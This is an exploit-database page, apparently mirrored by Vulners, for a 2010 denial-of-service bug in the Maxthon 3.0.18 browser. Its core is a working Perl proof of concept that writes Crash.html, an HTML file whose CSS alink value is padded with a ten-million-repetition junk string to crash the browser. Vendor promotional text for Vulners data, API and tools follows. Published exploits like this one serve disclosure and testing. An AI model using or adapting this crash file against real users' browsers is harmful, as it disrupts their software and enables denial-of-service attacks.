Lucene search
K

Maxthon 3.0.18.1000 - CSS Denial of Service

🗓️ 02 Nov 2010 00:00:00Reported by 4n0nym0usType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Maxthon 3.0.18.1000 CSS Denial of Service Vulnerabilit

Code
# 
######################################################################################### 
#                                                                                       # 
#  Title: Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability                       # 
#  Author: 4n0nym0us (Arash Sa'adatfar)                                                 # 
#  Developer: Maxthon International                                                     # 
#  Version:3.0.18                                                                       # 
#  Software Link: http://dl.maxthon.com/mx3/mx3.0.18.1000.exe                           # 
#                                                                                       # 
#  Tested On: Windows 7 Ultimate 32-bit                                                 # 
#                                                                                       # 
######################################################################################### 
# 
#!/usr/bin/perl 
my $file= "Crash.html"; 
my $junk= "A/" x 10000000;  
open($FILE,">$file"); 
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {alink: ".$junk."}\n</style>\n</head>\n</html>"; 
print "\nCrash.html File Created successfully\n"; 
close($FILE);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Nov 2010 00:00Current
7.4High risk
Vulners AI Score7.4
32